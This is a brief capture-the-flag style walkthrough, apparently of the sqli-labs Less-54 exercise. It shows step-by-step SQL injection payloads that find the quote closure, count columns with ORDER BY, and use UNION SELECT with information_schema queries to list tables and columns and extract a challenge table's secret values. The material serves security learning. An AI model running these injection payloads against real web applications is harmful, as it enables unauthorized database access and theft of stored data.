SQL injection Less54 (limited number of SQL injection + union injection)

Limited number of SQL injections
each reset, the table name, field name and data of the database will change.

?id=1

?id=1'
No error message found

?id=1"
The echo is normal, check the closing method at the beginning of double quotation marks directly

?id=1'--+
?id=1')--+
?id=1'))--+
The single quote echo is normal, so it is closed by the single quote

?id=1' order by 3--+ The echo is normal
?id=1' order by 4--+ The echo is wrong
So there are three columns

?id=-1' union select 1,version(),database()--+

?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+

?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+